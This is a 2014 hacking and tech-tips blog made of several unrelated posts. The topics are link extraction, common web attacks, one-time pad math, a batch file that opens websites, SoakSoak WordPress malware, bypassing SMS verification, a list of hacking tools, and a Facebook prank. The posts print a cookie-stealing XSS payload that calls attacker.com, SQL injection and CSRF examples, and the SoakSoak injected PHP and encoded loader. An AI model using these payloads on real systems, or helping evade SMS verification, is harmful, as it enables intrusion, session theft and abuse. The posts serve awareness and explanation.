This trick is very simple but is limited to Google chrome users. The trick is performed via the Chrome Dev tools.
Steps To Extract Hyperlinks From A Webpage In Chrome
1. Go to the page from which you want to extract the hyperlinks.
2. Click on 'Inspect Element' from the right click menu.
3. Click on the 'Console tab'
4. Now paste the following code in the input field.
urls = $$('a'); for (url in urls) console.log ( urls[url].href );
5. Hit enter.

iWeb Tools's Link Extractor

This is a web based service which means you don't have to download any software nor it is limited to any users.You can use this tool here.This tool will show the type of file along with the anchor text in the output field.
How To Use This Tool?

Using this tool is very simple. All you have to do is to go the the above url.Enter the webpage url in the input field and hit extract.

BuzzStream Tool

This is quite different from the other two because in this case we are extracting all the urls from an html code. This trick will not display the output links on the website itself. All the links on that page are exported as a CSV file which automatically downloads to your computer once you hit the create CSV button. The CSV file has three different columns including the actual link, it's original website and the anchor text.
How To Use This Tool?
1. Go to Buzz Stream Urls Extract Tool.
2. Copy the source code of the webpage from which you want to extract the Url.
3. Paste it in the tool's input field and hit create CSV. A CSV file containing the hyperlinks will automatically be downloaded to your computer.

How To Get The Source Code Of Webpages

Chrome: Right click on the webpage and click on view page source or press Ctrl U.
Internet Explorer: Right click from the webpage and click on view source.
Firefox & Netscape: Right click and click on view page source or press Ctrl U.
Opera: From the view menu click on source or press Ctrl F3.

17/12/2014

10 Most Popular Ways Hackers Hack Your Website

10 Most Popular Ways Hackers Hack Your Website
Here are the 10 most popular ways they can threaten the security of your site.

1. Injection Attacks

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or injections, unknowingly. In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data. Technical Injection Attack Example: An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID='” request.getParameter( “id”) ”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1 This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

2. Cross Site Scripting Attacks

XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate. For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info. Technical Cross Site Scripting Example:
(String) page = “<input name=’creditcard’ type=’TEXT’ value='” request.getParameter( “CC”) “‘>”;
The attacker modifies the CC parameter in their browser to:
‘><script>document.location=’ http://www.attacker.com/cgi-bin/cookie.cgi?foo=’document.cookie</script>’
This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session. That means the hacker has access to the website admin credentials and can take complete control over it.

3. Broken Authentication and Session Management Attacks

If the user authentication system of your website is weak, hackers can take full advantage. Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid). If a hacker exploits the authentication and session management system, they can assume the user’s identity.
Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:
*. Are user credentials weak? *. Can credentials be guessed or overwritten through weak account management functions? *. Are session IDs exposed in the URL? *. Are session IDs vulnerable to session fixation attacks? *. Do session IDs timeout and can users log out? If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

4. Clickjacking Attacks

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing. Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be. For example, using a carefully crafted combination of style sheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker. Clickjacking Example: Here’s a live, but safe example of how clickjacking works: [CLICK HERE TO SEE EXAMPLE]

5. DNS Cache Poisoning

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic” Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server. This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path. In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

6. Social Engineering Attacks

A social engineering attack is not technically a “hack” It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website. The problem, of course, is that you’re not getting into what you think you’re getting into. A classic example of a social engineering attack is the “Microsoft tech support” scam. This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course. Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

7. Symlinking: An Insider Attack

A symlink is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not. If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions. In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

8. Cross Site Request Forgery Attacks

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information. In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account. This is why websites ask you to log out of your account when you’re finished, it will expire the session immediately. In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker. A Cross Site Attack Examples:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
<img src=”>span  style=”color: red;”>
http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />
In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

9. Remote Code Execution Attacks

A Remote Code Execution attack is a result of either server side or client side security weaknesses. Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information. The following vulnerable components were downloaded 22 million times in 2011: Apache CXF Authentication Bypass
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)
By failing to provide an identity token, attackers could invoke any web service with full permission.

10. DDoS Attack: Distributed Denial Of Service Attack

DDoS or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users. And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage. It’s kind of like having your car stolen when you really need to get somewhere fast. The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system. The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time. This causes bottlenecking at the server side because the CPU just ran out of resources. Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

16/12/2014

How to Use Math to Decrypt a Secret Messages

How to decrypt a secret message using math
Before we take you to the steps it's better to understand the Cryptography.
Introduction: Cryptography is the process of data translation into a secret code. On the other hand, Cryptography is a mothod of storing and transmitting data in a particular form so that only those for whom it is intended can read and process it. Cryptography involves into two processes, one in Encryption and the other in Decryption. Encryption: Encryption is the conversion of any data into unreadable form, called ciphertext, which cannot be easily understood by everyone except authorized parties. The term is most often associated with scrambling plaintext which referred to as cleartext into ciphertext this process is called encryption. e.g you've a girlfriend and her real names is Kaitlin but having a fear of her muscular brother(s), you always call her my heart, my soul, sweetie etc. That's means you have encrypted her name. Decryption: Decryption is the process of taking encoded/encrypted text or other data and converting it back into readable text/data that you or the computer are able to read and understand it. e.g (repeat the above example in opposite direction). Who Uses The Cryptography? Cryptography is usually used by the Government Spy Agents, Criminals, Hackers and other sensitive organisations in order to protect their data from being leaked.
You might have seen the army or police operators while talking on their wireless set. They use their secret codes to transmitte their messages securely. In world war II, Cryptography was used by many countries. You might think that the author is wasting your time by writting the stories. But as a true believer, believe me it would help you alot to understand the article very well.

How to Decrypt a Secret Message
Suppose, you are a police officer, Army officer, Cheif of an party or whatever. You pull out a small notepad that was issued to you before leaving on your trip. Its pages contain sequences of completely random numbers between zero and twenty-five. Armed with your notepad and the scrambled secret message, you begin the decryption process. Here’s how it works. Start by looking up the first random number in your notepad. In this case it’s two and then cross it out so you don’t accidentally use it again. This first number is used to decrypt the first letter of your or your enemies message. Beginning with the first letter in your message, P count forward through the alphabet two characters Q is one and R is two. So R is the first letter of your decoded message. All you have to do is repeat the process for each of the final two letters of your message. You look-up the next random number in your notepad nineteen. So start at the letter B the second letter in the scrambled message and count forward nineteen letters until, eventually, you reach the letter U This is the second letter in your decoded message. Finally, for the last letter A you see the next random number in your notepad is thirteen. You count forward thirteen letters from A and arrive at N. So, you’ve now got your entire message decrypted and it says Run. right?

The One-Time Pad Method of Encryption
Before we get to that, let’s take a minute to talk about this encryption method called the one-time pad that played a major role in sending secret messages throughout much of the 20th century. The name one-time pad comes from the fact that the series of random numbers in the notepad must be used only one time. If a pad is reused, patterns can emerge that give away the random numbers in the pad, and the encryption can then be broken quite easily by an intercepting party. Additionally, these numbers must be absolutely random (not just sort of random) or, once again, patterns can develop that make it easy to figure out the contents of the pad and, if someone knows the numbers in your pad, your encryption is useless.

Secret Agent Math II
Now, let’s get back to the story. Recall that you’ve just deciphered a secret message telling you to Run You ponder for a moment whether or not the message is a joke. if your running was that urgent, why wouldn’t your colleague just yell? But then you remember that this colleague is known for strictly over-following standard industry encryption protocols, so you realize it is a real message and make a mad dash for the door. But having taken so long to comprehend the urgency of the message, you’re grabbed and hustled into the trunk of a car and driven away leaving your colleague to ponder the folly of his ways. Apparently, he now realizes, encryption isn’t always necessary sometimes simple solutions are better. But, your alter-ego’s misfortune in our drama is your own good fortune in real life since, if for some bizarre reason you ever need to secretly share information with someone, you now can do it using a one-time pad.

The Math Behind One-Time Pad Encryption

Before wrapping-up, let’s take a minute to talk a little more about the math behind one-time pad encryption. Start by assigning each letter of the alphabet a corresponding integer value between 1 and 26. A=1, since A is the first letter of the alphabet, B=2, since B is the second letter, and so on until you get to Z=26, the last letter of the alphabet. If you take the integer value that corresponds to a particular scrambled letter in your encrypted message (say the letter is P with an integer value of 16) and add it to the associated random number from a one-time pad (say the number is two), then you get a new integer in this case 16, 2=18 which can then be converted back into the letter R which you’ll recognize to be the first decrypted letter in the message from our article.

How to Solve Math Problems

That’s all well and good, but here’s an interesting case: What would happen if the scrambled letter you were trying to decrypt was Y and the corresponding random number was 25? If we count forward through the alphabet from Y we’ll obviously get to Z but then what? Well, in this case, the answer is to loop back around and start again at A That’s the way the one-time pad system is defined to work. So you could start at Y count forward to Z jump back to A and then proceed 23 more letters forward and eventually arrive at X But how about this: Instead of counting forward 25 letters from Y couldn’t you also just count backward one letter? And isn’t counting backward one letter a lot easier? And a lot less error prone too? It is. So what’s my point here? Well, in math, as in life, there’s usually more than one way to solve a problem and some ways are easier than others. So here’s the quick tip work smart. Simply yelling Run. instead of going to the trouble of sending an encrypted message would be smart. Counting one letter backward through the alphabet instead of twenty-five forward would be smart too. Think before acting and you’ll solve more problems while working less that’s a pretty tough combination to beat.

15/12/2014

How To Open Multiple Websites With double Click

How to Open Multiple Websites With double Click
Notepad is a common text-only editor. The resulting files—typically saved with the .txt extension—have no format tags or styles, making the program suitable for editing system files to use in a DOS environment and, occasionally, source code for later compilation or execution, usually through a command prompt. It is also useful for its negligible use of system resources; making for quick load time and processing time, especially on under-powered hardware. Notepad supports both left-to-right and right-to-left based languages. Unlike WordPad, Notepad does not treat new lines in Unix or Mac-style text files correctly. Notepad offers only the most basic text manipulation functions, such as finding text. Only newer versions of Windows include an updated version of Notepad with a search and replace function.
However, it has much less functionality in comparison to full-scale editors.

How to open multiple websites with double click in Notepad
1. Open Notepad.
2. Copy and Paste the below Code in Notepad without any error.

@echo off
start
http://deadlyuniversityspy.blogspot.com/
start
https://m.facebook.com/computers1
start
http://deadlyuniversityspy.blogspot.in/2014/11/how-to-connect-to-protected-wi-fi.html
start
http://deadlyuniversityspy.blogspot.in/2014/11/how-to-encrypt-your-wireless-network.html
start
https://m.facebook.com/groups/270993376312145
start
http://www.google.com/
3. Save Notepad file as Sites.bat you can save with any name but .bat extension is important and save on Desktop or save anywhere for your convenience.
4. Now just double click newly created file, you can see six websites will open at once.
Note:- You can add more sites by editing Sites.bat using Notepad.

New SoakSoak Malware Compromises Over 100,000+ WordPress Websites

New ‘SoakSoak’ Malware Compromises Over 100K WordPress Websites
The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a wides pread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.
Earlier Sunday morning, news broke throughout the WordPress community regarding a widespread malware attack that has already comprised over 100,000 websites and counting. This harmful malware campaign has been brought forth by SoakSoak.ru thus being dubbed the ‘SoakSoak Malware’ epidemic. Those affected by the virus may be experiencing erratic site behavior including unexpected redirects to SoakSoak.ru web pages along with the potential for automatic downloads of malicious files to visitor’s computers without consent. Google has already been on top of this infection and has added over 11,000 websites to their blacklist that could have a serious effect on the revenue potential for those site owners. The infections aren’t targeted strictly at WordPress sites, but it appears this is the largest platform that has been infected. According Sucuri, a WordPress security solution, the exact method of intrusion has not been pinpointed at this time although several signals led them to believe many WordPress users could have fallen victim to a recent vulnerability in the premium Slider Revolution plugin If you’re a site owner and worried about the potential risk of infection to your own website, head over to Free SiteCheck scanner to see whether you are in the clear or if the malware has already burrowed its way into your site.
How to remove SoakSoak malware
(Sucuri – SoakSoak – SiteCheck)

SoakSoak Malware Anatomy
It is modifying the filewp-includes/template-loader.php and including this content:
<?php
function
FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts",
'FuncQueueObject');
This causes the wp-includes/js/swobject.js to be loaded on every page you view on the site which includes the malware here:
eval(decodeURIComponent
("%28%0D
%0A%66
%75%6E
%63%74
%69%6F
%6E%28
%29%0D
%0A%7B
%0D%..72
%69%70
%74%2E
%69%64
%3D%27
%78%78
%79%79
%7A%7A
%5F%70
%65%74
%75%73
%68%6F
%6B%27
%3B%0D
%0A%09
%68%65
%61%64
%2E%61
%70%70
%65%6E
%64%43
%68%69
%6C%64
%28%73
%63%72
%69%70
%74%29
%3B%0D
%0A%7D
%28%29
%0D%0A
%29%3B"));
This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file:
hxxp://soaksoak.ru/xteas/code

How Remove SoakSoak Malware?
Currenty, there's no removal procedure yet to be found. Howere, we have listed the some steps to bring it down.
1. If you have installed a theme, template, or any plugin from SoakSoak.ru remove it immediately.
2. If you've hosted your WordPress site to any other hosting service, check there all you files and look for the above mentioned codes that cause the site infection.
3. If you believe you had never visited the SoakSoak.ru but you are observing unfamiliar behaviour of your WordPress site, login to you site then expand the widget templete and look for above mentioned codes and remove them.
4. When yo finish the step 1 and step 2 and 3, go back to Free SiteCheck scanner and scan it again to know whether your site is okay or not.
Love this article?
Share it with your friends on Facebook

14/12/2014

How to Bypass Phone SMS Verification of any Website

How to Bypass Phone SMS Verification
Well before even starting the ways let us know why do we need to by pass SMS verification of any website. So just imagine you are a CEO of any organisation so why would you like to maintain a contact list? Sending Regular updates. Information regarding a product or service! Asking Reasons why the user is offline for many days? And all types of spamming even. But think outside the box and experts say you are directly submitting your number to the N.S.A or the C.I.A! That sounds a bit odd in listening but that is the truth how they keep a track of there suspects.
Well now you might have noticed when ever creating a new account on Gmail, Yahoo or other bigger websites possibly Facebook you come across the SMS verification step where you need to use in your mobile number in order to receive a small verification code that you need to enter to get verification whether are you a real user not a spamming robot.
Well now for many reasons you might not be able to verify your mobile number like your phone was recently used, your phone might be nor working, or you do not have a phone but you are eligible to browse internet and create accounts and many other reasons.
Well now to overcome all those situations we have online website's that allow you to receive sms online easily by just entering the pre-mentioned alternative mobile numbers on their websites. I have listed few best and free website's below:
NOTE: Before you use these sites, you have to enable the JavaScripts in your web browser otherwise you may not use these websites. Don't know how to activate the JavaScripts? Go through this link and Enable the JavaScripts
1. Receive SMS Online: is the first recommended website for online sms verification, you select any number of different countries mentioned on this website and do attempt a successful sms verification.
2. Receive SMS: is another website that allows you to receive sms online on any number mentioned on this website, you can pick up an number and receive messages on that number easily.
3. Receive E-SMS Online: is a spam free online sms receiving website that allows you to receive sms online for sms verification.

Online Free SMS Verification Procedure

Go to the above listed website and pick up any website (but we recommended you Receive SMS Online:) and follow below steps in order to bypass online sms verification for any website.
1. After Signing-Up you come across the sms verification option, just open the website and enter the number mentioned on those websites.
2. Now after entering that number hit Submit and in few seconds you will receive message on that number so click on that number to see all the messages received.
3. Now you will see messages for that number and wait for some seconds and refresh the page to see your verification message.
4. As soon as you receive message from the website you have Signed-Up for, copy that number (verification code) and enter that on the website page and hit Submit.
Congratulations your online phone sms verification has been completed. Use it for genuine purpose. We only recommend if you seriously do not have phone and you are stuck in some serious problems else this online verification could snatch your privacy by displaying your message to people publicly. So use this service with caution.

How to Enable JavaScript in your Browser

How to Enable JavaScript in your Browser

Introduction to JavaScript
JavaScript is a programming language used to make interactive web pages. It runs on visitor's computer and doesn't require constant downloads from your website. JavaScript enhances your web browsing experience..
Don't get confused with Java? Both Java and JavaScript are two different computer languages. Only their names are similar.
Almost all modern web browsers use JavaScript to convenience their users for better web browsing. But for this; you must enable JavaScript from your browser. By default, JavaScript is enabled in your web browser. However, if you've accidently disabled the JavaScript, you need to follow our guide in order to enable it.
Recommend Post:-How to Prevent Browser Hijacking
To view Google ads on a website/blog, you need to have JavaScript enabled in your browser. To activate JavaScript, please follow the instructions below:
JavaScript Activation

Google Chrome
Click the Chrome menu icon on the browser toolbar (upper right corner). > Settings > Show advanced settings > Privacy > Content settings > Allow all sites to run JavaScript (recommended) in the JavaScript section > Done
Read Also:-How to Fix Unable to Connect to Proxy Server in Chrome

Safari
In the Edit drop-down menu > Preferences > Security icon > Enable JavaScript checkbox and close the window to save your changes.
Read Also:-How to Set Up Proxy Connection in Safari

Mozilla Firefox
Click the Tools drop-down menu > Options > Content and Check the boxes next to Block pop-up windows > Enable JavaScript > OK.
-------------OR-------------

In the address bar, type about:config > Enter > I'll be careful, I promise again in the search bar, search for javascript.disabled Right click the result named javascript.disabled > Toggle. JavaScript is now enabled.
Read Also:-How to Fix Proxy Server Connection Problem in Firefox

Internet Explorer
In the Tools drop-down menu, Select Internet Options > Security > Earth (Internet icon) > Custom Level > Scripting near > Enable > OK. > Yes > OK and close the browser and relaunch.
Read Also:-Internet Explorer navigation

Opera
In the Tools drop-down menu at the top of the window, select Preferences > Advanced > Content item > Enable JavaScript checkbox > OK to save your changes and close your browser then relaunch it.
Love this article?
Share it with your friends on Facebook

12/12/2014

Top 10 Most Hacking Techniques and Tools

Top most popular hacking techniques
We timely provides you hacking techniques, methods and tutorials, so that you can understand how hackers gain access into your networks, websites, computers etc.
Here I have listed the top 10 most popular tools used in hacking. It is advisable to master these tools to learn Cyber security.
Read Also:-Hack Any Remote PC By IP Address Using Kali Linux

1. Nmap
Nmap is also known as the swiss army knife of hacking. It is the best port scanner with a lot of functions. In hacking, Nmap is usually used in the footprinting phase to scan the ports of the remote computer to find out wich ports are open.

2. WireShark
Not to be confused with WireLurker? WireShark is a packet sniffer. It captures all network traffic going through a network adapter. When performing man in the middle attacks using tools like Cain, we can use Wireshark to capture the traffic and analyze it for critical info like usernames and passwords. It is used by network administrators to perform network troubleshooting.
Read Also:-Hacking Facebook Using Man in the Middle Attack

3. Cain and Abel
Cain and Abel is a multipurpose windows only hacking tool. It is a bit old now, but it still does the job well. Cain can be used to crack windows password, perform man in the middle attacks, capture network passwords etc.

4. Metasploit
Metasploit is a huge database of exploits. There are thousands of exploit codes, payloads that can be used to attack web servers or any computer for that matter. This is the ultimate hacking tool that will allow a hacker to actually hack a computer. A hacker will be able to get root access to the remote computer and plant backdoors or do any other stuff. It is best to use metasploit under linux.

5. Burp Suite
Burp suite is a web proxy tool that can be used to test web application security. It can brute force any login form in a browser. You can edit or modify GET and POST data before sending it to the server. It can also be used to automatically detect SQL injection vulnerabilities. It is a good tool to use both under Windows and Linux environments.

6. Aircrack-ng
Aircrack-ng is a set of tools that are used to crack wifi passwords. Using a combination of the tools in aircrack, you can easily crack WEP passwords. WPA passwords can be cracked using dictionary or brute force. Although aircrack-ng is available for Windows, it is best to use it under Linux environment. There are many issues if you use it under Windows environment.

7. Nessus
Nessus is a comprehensive automatic vulnerability scanner. You have to give it an IP address as input and it will scan that IP address to find out the vulnerabilities in that system. Once you know the vulnerabllities, you can use metasploit to exploit the vulnerablity. Nessus works both in Windows and Linux.

8. THC Hydra
Hydra is a fast password cracker tool. It cracks passwords of remote systems through the network. It can crack passwords of many protocols including ftp,http, smtp etc. You have the option to supply a dictionary file which contains possible passwords. It is best to use hydra under linux environment.

9. Netcat
Netcat is a great networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is also known as the swiss army knife for TCP/IP. This is because netcat is extremely versatile and can perform almost anything related to TCP/IP. In a hacking scenario, it can be used as a backdoor to access hacked computers remotely. The use of netcat is limited only by the user's imagination.

10. Putty
Although putty is not a hacking software by itself, it is a very useful tool for a hacker. It is a client for SSH and telnet, which can be used to connect to remote computers. You may use putty when you want to connect to your Backtrack machine from your Windows PC. It can also be used to perform SSH tunneling to bypass firewalls.
Note: This list is not comprehensive. There are many tools that I have left out. Those tools that did not make the list are; Sqlmap, Havij, Acunetix Web Scanner

10/12/2014

Facebook Ghost Prank-Apply to Shock

Facebook ghost prank apply to shock
Facebook is one of the most famous social networking sites as you all know. There are many awesome Facebook tricks which you could apply to amaze and shock your friends and one of them is Facebook Ghost Prank.
Read Also:-How to Like All Facebook Status Updates with A Single Click
When you’ll apply this Ghost Prank on your friend then it would be real fun. Since, I personally have applied this prank on my friends to make them scream and I simply loved it. You can also enjoy to make your friends scream with the help of this Ghost Prank. The motive of this article is just to create little humor and fun in your lives, we are not sharing it to hurt your personal sentiments. Additionally, do not forget to read out the caution before proceeding, it is really very important.

Facebook Ghost Prank Steps
So, here are the steps which you are supposed to follow to apply Facebook Ghost Prank on your friends to shock. We are sure that you are going to love that feeling while your friends will scream with this awesome and horror prank. Please do not apply this prank on Heart Patients and Children at all.
First of all Click on the Ghost Profile Link Ones you have downloaded the Ghost, click the Profile link then you will be redirected to Ghost Profile Afterwards, wait for few seconds or a minute then a ghost will get appear on your screen by tearing a window with a horrible scream. The ghost image would be same like below one.
Facebook ghost prank
Now, simply Copy that link and send it to your friend and enjoy their screams.
Caution: Don’t try this Prank on heart patients and Children. It might create some serious health problem for them. So, please respect the sentiments and health issues of others.
Love this article?
Share it with your friends on Facebook